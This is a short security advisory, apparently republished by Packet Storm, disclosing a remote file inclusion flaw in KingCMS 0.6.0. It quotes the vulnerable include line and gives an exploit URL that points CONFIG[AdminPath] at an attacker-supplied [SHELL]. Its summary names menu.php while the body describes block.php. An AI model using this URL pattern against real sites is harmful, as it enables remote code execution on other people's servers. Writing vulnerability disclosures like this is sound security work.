King CMS version 0.6.0 suffers from a remote file inclusion vulnerability in menu.php.
8b4fc58aea5227750a9fc6711b6cb0c9a7d44f9e866630d837e358e45b614734########################## Securitylab.ir ########################
# Application Info:
# Name: Kingcms
# Version: 0.6.0
# Website: http://sourceforge.net/projects/kingcms
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Inclusion Vulnerability
# Risk: High
#===========================================================
# block.php
# ...
# require_once($CONFIG['AdminPath'] . "/include/engine/content/contentvariable.php");
# ...
#
# http://site.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL]
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed